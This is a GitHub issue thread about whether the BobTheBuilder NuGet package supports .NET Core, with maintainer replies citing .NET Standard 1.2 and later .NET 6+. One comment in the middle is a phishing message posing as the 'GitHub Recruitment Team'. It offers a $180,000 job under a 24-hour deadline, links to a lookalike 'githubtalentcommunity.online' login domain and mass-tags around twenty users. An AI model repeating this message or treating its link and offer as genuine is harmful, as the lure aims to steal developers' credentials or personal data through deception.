### ISSUE TITLE
Doesn't work with .net core

### ISSUE THREAD

**Issue by sjn88** [alastairs/BobTheBuilder#2]
Is there any timeframe for support for core? Ran a quick nuget pull on the package and it said it didn't support it.

**Comment by alastairs** [comment]
It should support .NET Standard 1.2 as of v0.5 released a day or two ago, but perhaps the build/package hasn't been configured correctly. Did you get any helpful messages when trying to add it?

**Comment by lupu2022** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
BrendanThompson, @alekonko, @ntnguyencse, @flumpus-dev, @longliveenduro, @DragonBanana, @ricochette05, @TakiJoe, @songyunlu, @aNerdFromDuval, @hatowang, @BobyMCbobs, @isnuryusuf, @SataQiu, @usmanovbf, @jinsoo-youn, @bad-d3vl0pr, @bretagne-peiqi, @takitsuba, @yttan

**Comment by alastairs** [comment]
Tests confirm support for .NET 6+.
